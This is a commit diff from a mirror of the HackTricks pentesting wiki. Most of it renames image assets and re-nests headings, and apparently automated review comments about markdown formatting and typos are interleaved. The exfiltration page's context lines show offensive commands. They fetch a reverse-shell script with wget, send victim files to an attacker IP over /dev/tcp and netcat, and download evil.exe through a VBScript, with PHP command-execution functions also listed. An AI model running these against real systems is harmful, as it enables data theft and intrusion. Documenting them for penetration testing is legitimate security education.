mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3330] No subject
This commit is contained in:
parent
25207a20d2
commit
341a55ff9d
28 changed files with 104 additions and 108 deletions
BIN
.gitbook/assets/image (307) (5) (1).png
Normal file
Binary file not shown. (After: Size 509 KiB)
Binary file not shown. (Before: Size 509 KiB; After: Size 96 KiB)
Binary file not shown. (Before: Size 96 KiB; After: Size 14 KiB)
@ -26,7 +26,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
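Review bot: the only change in this hunk is one more `(1)` appended to the `image (345) (2) ... (1).png` asset name (second image line). These suffix chains grow on every GitBook sync and make the asset references hard to read and easy to mismatch against the files actually in `.gitbook/assets/`; consider renaming the asset once to a short descriptive name and updating the reference, instead of carrying a filename with thirty bracketed suffixes.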
@ -58,7 +58,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
### [Security Hubs](https://securityhubs.io/)
|
||||
|
||||
![](<.gitbook/assets/security-hubs-logo\_v1.2 (1).png>)
|
||||
![](<.gitbook/assets/image (307).png>)
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results.** [**Security Hubs**](https://securityhubs.io/) **** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
|
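Review bot: the logo reference changes from the descriptive `security-hubs-logo_v1.2 (1).png` to the generic `image (307).png`, but the file list at the top of this commit adds `image (307) (5) (1).png`, not `image (307).png`. Please confirm that `.gitbook/assets/image (307).png` exists in the tree, otherwise the sponsor logo renders as a broken image; keeping the descriptive filename would also keep the reference self-explanatory.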
@ -75,7 +75,7 @@ Through Security Skills as a Service, we help organizations to **defend against
|
|||
|
||||
### [Intigriti](https://www.intigriti.com)
|
||||
|
||||
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
|
||||
|
||||
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
|
||||
|
||||
|
|
|
@ -405,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
|
|||
|
||||
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
|
||||
|
||||
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
|
||||
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
|
||||
|
||||
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
|
||||
|
||||
|
|
|
@ -65,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (3).png>)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
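Review bot: this hunk only renames the `image (413)` asset, but the surrounding context has two typos that are cheap to fix in the same file: "you can use `fdisk` and the the `p` command" (doubled "the") and "An then use the following code" ("And then").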
|
|
@ -152,7 +152,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -1,5 +1,7 @@
|
|||
# Exfiltration
|
||||
|
||||
## Exfiltration
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
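Review bot: the added `## Exfiltration` heading directly under the `# Exfiltration` page title duplicates the title and adds no structure; together with the later hunks in this file, which demote every other heading by one level, it nests the whole page one level deeper than needed. If the goal was to fix the stray `# SSHFS` H1 further down, demoting that single heading is enough; drop the duplicated H2 here.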
@ -16,32 +18,30 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
## Copy\&Paste Base64
|
||||
### Copy\&Paste Base64
|
||||
|
||||
#### Linux
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
base64 -w0 <file> #Encode file
|
||||
base64 -d file #Decode file
|
||||
```
|
||||
|
||||
#### Windows
|
||||
**Windows**
|
||||
|
||||
```
|
||||
certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
```
|
||||
|
||||
## HTTP
|
||||
### HTTP
|
||||
|
||||
#### Linux
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
|
||||
|
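Review bot: `#### Linux` becomes plain bold `**Linux**` (and `#### Windows` likewise), which removes these subsections from the GitBook outline and deletes their heading anchors, so any deep link to the Linux or Windows variant stops resolving. Keep them as headings (`####`, or `#####` if the levels are being re-nested) rather than bold text.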
@ -50,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
|
|||
fetch 10.10.14.14:8000/shell.py #FreeBSD
|
||||
```
|
||||
|
||||
#### Windows
|
||||
**Windows**
|
||||
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
|
||||
|
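Review bot: the Windows download block keeps a ```bash fence although its content is `certutil -urlcache -split -f ...`, a Windows command; the Copy&Paste Base64 section above uses an untagged fence for the same tool. Tag both consistently (`cmd`, or `powershell` for the BITS lines) so the listing is labelled for the shell it is actually typed into.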
@ -67,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
|
|||
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||||
```
|
||||
|
||||
### Upload files
|
||||
#### Upload files
|
||||
|
||||
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
|
||||
### **HTTPS Server**
|
||||
#### **HTTPS Server**
|
||||
|
||||
```python
|
||||
# from https://gist.github.com/dergachev/7028596
|
||||
|
@ -114,23 +114,23 @@ if __name__ == "__main__":
|
|||
###
|
||||
```
|
||||
|
||||
## FTP
|
||||
### FTP
|
||||
|
||||
### FTP server (python)
|
||||
#### FTP server (python)
|
||||
|
||||
```bash
|
||||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
|
||||
### FTP server (NodeJS)
|
||||
#### FTP server (NodeJS)
|
||||
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
```
|
||||
|
||||
### FTP server (pure-ftp)
|
||||
#### FTP server (pure-ftp)
|
||||
|
||||
```bash
|
||||
apt-get update && apt-get install pure-ftp
|
||||
|
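Review bot: the line containing only `###` just before the closing fence of the HTTPS server block (top of this hunk) sits inside the Python code block and looks like a leftover heading marker; it will print as part of the code listing. Also, the NodeJS `ftp-srv` fence is untagged while the neighbouring `pyftpdlib` and `pure-ftp` fences use ```bash.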
@ -150,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
|
|||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
|
||||
### **Windows** client
|
||||
#### **Windows** client
|
||||
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
|
@ -163,14 +163,12 @@ echo bye >> ftp.txt
|
|||
ftp -n -v -s:ftp.txt
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
## SMB
|
||||
### SMB
|
||||
|
||||
Kali as server
|
||||
|
||||
|
@ -208,7 +206,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
|
|||
WindPS-2> cd new_disk:
|
||||
```
|
||||
|
||||
## SCP
|
||||
### SCP
|
||||
|
||||
The attacker has to have SSHd running.
|
||||
|
||||
|
@ -216,7 +214,7 @@ The attacker has to have SSHd running.
|
|||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
||||
# SSHFS
|
||||
## SSHFS
|
||||
|
||||
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
|
||||
|
||||
|
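Review bot: `# SSHFS` becoming `## SSHFS` fixes the stray H1, but every sibling section in this file (`### SCP` just above, `### NC` just below) is now at `###`, so SSHFS still sits one level too high and will show up as a separate top-level entry in the outline. Demote it to `### SSHFS` to match its siblings.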
@ -226,23 +224,23 @@ sudo mkdir /mnt/sshfs
|
|||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
|
||||
## NC
|
||||
### NC
|
||||
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
```
|
||||
|
||||
## /dev/tcp
|
||||
### /dev/tcp
|
||||
|
||||
### Download file from victim
|
||||
#### Download file from victim
|
||||
|
||||
```bash
|
||||
nc -lvnp 80 > file #Inside attacker
|
||||
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||||
```
|
||||
|
||||
### Upload file to victim
|
||||
#### Upload file to victim
|
||||
|
||||
```bash
|
||||
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||||
|
@ -253,7 +251,7 @@ cat <&6 > file.txt
|
|||
|
||||
thanks to **@BinaryShadow\_**
|
||||
|
||||
## **ICMP**
|
||||
### **ICMP**
|
||||
|
||||
```bash
|
||||
#In order to exfiltrate the content of a file via pings you can do:
|
||||
|
@ -273,7 +271,7 @@ def process_packet(pkt):
|
|||
sniff(iface="tun0", prn=process_packet)
|
||||
```
|
||||
|
||||
## **SMTP**
|
||||
### **SMTP**
|
||||
|
||||
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
|
||||
|
||||
|
@ -281,7 +279,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
|
|||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
||||
## TFTP
|
||||
### TFTP
|
||||
|
||||
By default in XP and 2003 (in others it need to be explicitly added during installation)
|
||||
|
||||
|
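Review bot: the context line `sudo python -m smtpd -n -c DebuggingServer :25` relies on the standard-library `smtpd` module, which was deprecated in Python 3.6 and removed in Python 3.12, so the command fails on current interpreters. Since this section is being touched, add a note that it needs Python < 3.12 or point readers to the `aiosmtpd` package, and fix the context sentence "create a SMTP to receive the data" (missing "server").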
@ -307,7 +305,7 @@ In **victim**, connect to the Kali server:
|
|||
tftp -i <KALI-IP> get nc.exe
|
||||
```
|
||||
|
||||
## PHP
|
||||
### PHP
|
||||
|
||||
Download a file with a PHP oneliner:
|
||||
|
||||
|
@ -315,13 +313,13 @@ Download a file with a PHP oneliner:
|
|||
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||||
```
|
||||
|
||||
## VBScript
|
||||
### VBScript
|
||||
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
```
|
||||
|
||||
#### Victim
|
||||
**Victim**
|
||||
|
||||
```bash
|
||||
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
|
||||
|
@ -355,7 +353,7 @@ echo ts.Close >> wget.vbs
|
|||
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
||||
```
|
||||
|
||||
## Debug.exe
|
||||
### Debug.exe
|
||||
|
||||
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
|
||||
|
||||
|
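Review bot: the Debug.exe paragraph in the context describes the `exe2bat` step as "disassemble it into hex"; the tool produces a hex dump that `debug.exe` reassembles into a binary, not a disassembly, so "dump it to hex" is more accurate, and "take a binaries" should read "take a binary". Same issue as earlier in the file: `#### Victim` is turned into bold `**Victim**`, losing the heading anchor.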
@ -373,16 +371,14 @@ wine exe2bat.exe nc.exe nc.txt
|
|||
|
||||
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
|
||||
|
||||
## DNS
|
||||
### DNS
|
||||
|
||||
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
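Review bot: the Intigriti tip line ends with `\\` (an escaped backslash) here and in the next hunk, while the third copy in this file ends without it. In GitBook markdown a single trailing `\` is a hard line break and `\\` renders a literal backslash after the text. Make all three copies consistent, ideally by dropping the trailing `\\`.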
@ -78,7 +78,7 @@ There are also several tools that can perform **automatic vulnerabilities assess
|
|||
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -165,7 +165,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
|
|||
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">****\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">****\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
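Review bot: the `<img ...>` line carries a trailing `****` (an empty bold span) in both the old and the new version; it is dead markup and some renderers show it as literal asterisks. Since the line is already being rewritten for the asset rename, remove the `****` at the same time.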
@ -792,7 +792,7 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
|
|||
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -343,7 +343,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
|||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png>)
|
||||
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (6).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
|
||||
|
|
|
@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate (from APNS)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -241,7 +241,7 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
|
||||
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
|
||||
|
||||
|
|
|
@ -731,7 +731,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
|
|||
5. Reproduce the problem.
|
||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
|
||||
|
||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -249,7 +249,7 @@ Entry_5:
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -90,11 +90,11 @@ Now that we know which kind of information is saved inside the database, let's t
|
|||
|
||||
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
|
||||
|
||||
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
|
||||
|
||||
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
|
||||
|
||||
|
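Review bot: the screenshots are re-referenced by slug (`screenshot-from-2021-03-13-18-17-48.png` instead of `Screenshot from 2021-03-13 18-17-48.png`); confirm the three binaries were renamed in this commit as well, because the reference change alone leaves three broken images. In the context, "composed by **name** and .**value** Then" has the period on the wrong side of `value`.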
@ -217,7 +217,7 @@ Or even **relations of several different objects using aliases**:
|
|||
|
||||
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
|
||||
|
||||
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
|
||||
|
||||
|
@ -277,7 +277,7 @@ Below you can find the simplest demonstration of an application authentication r
|
|||
|
||||
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
|
||||
|
||||
![](<../../.gitbook/assets/image (119) (2).png>)
|
||||
![](<../../.gitbook/assets/image (119) (1).png>)
|
||||
|
||||
## CSRF in GraphQL
|
||||
|
||||
|
@ -312,6 +312,7 @@ Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** mi
|
|||
For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
|
||||
|
||||
## Authorization in GraphQL
|
||||
|
||||
Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization.
|
||||
|
||||
Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927).
|
||||
|
@ -327,6 +328,7 @@ Mutation could even lead to account take over trying to modify other account dat
|
|||
```
|
||||
|
||||
## Leaked GraphQL Structures
|
||||
|
||||
If introspection is disabled, try looking at the website source code. The queries are often pre loaded into browser as javascript libraries. These prewritten queries can reveal powerful information about the schema and use of each object and function. The `Sources` tab of the developer tools can search all files to enumerate where the queries are saved. Sometimes even the administrator protected queries are already exposed.
|
||||
|
||||
```javascript
|
||||
|
|
|
@ -338,7 +338,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
If you see an error like the following one:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png>)
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10).png>)
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.\
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# PHP - Useful Functions & disable\_functions/open\_basedir bypass
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## PHP Command & Code Execution
|
||||
|
||||
# PHP Command & Code Execution
|
||||
|
||||
## PHP Command Execution
|
||||
### PHP Command Execution
|
||||
|
||||
**exec** - Returns last line of commands output
|
||||
|
||||
|
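Review bot: demoting `# PHP Command & Code Execution` to `##` and `## PHP Command Execution` to `###` is the right fix for this file, which previously had several H1s below the page title. Check that any cross-page links pointing at the `#php-command-execution` style anchors still resolve after the level change, since the page's own outline is what other HackTricks pages link into.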
@ -83,7 +82,7 @@ file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA
|
|||
|
||||
**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
|
||||
|
||||
## PHP Code Execution
|
||||
### PHP Code Execution
|
||||
|
||||
Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.\
|
||||
**${\<php code>}** - If your input gets reflected in any PHP string, it will be executed.\
|
||||
|
@ -101,7 +100,7 @@ Apart from eval there are other ways to execute PHP code: include/require can be
|
|||
**$func->invokeArgs(array());**\
|
||||
**serialize/unserialize**
|
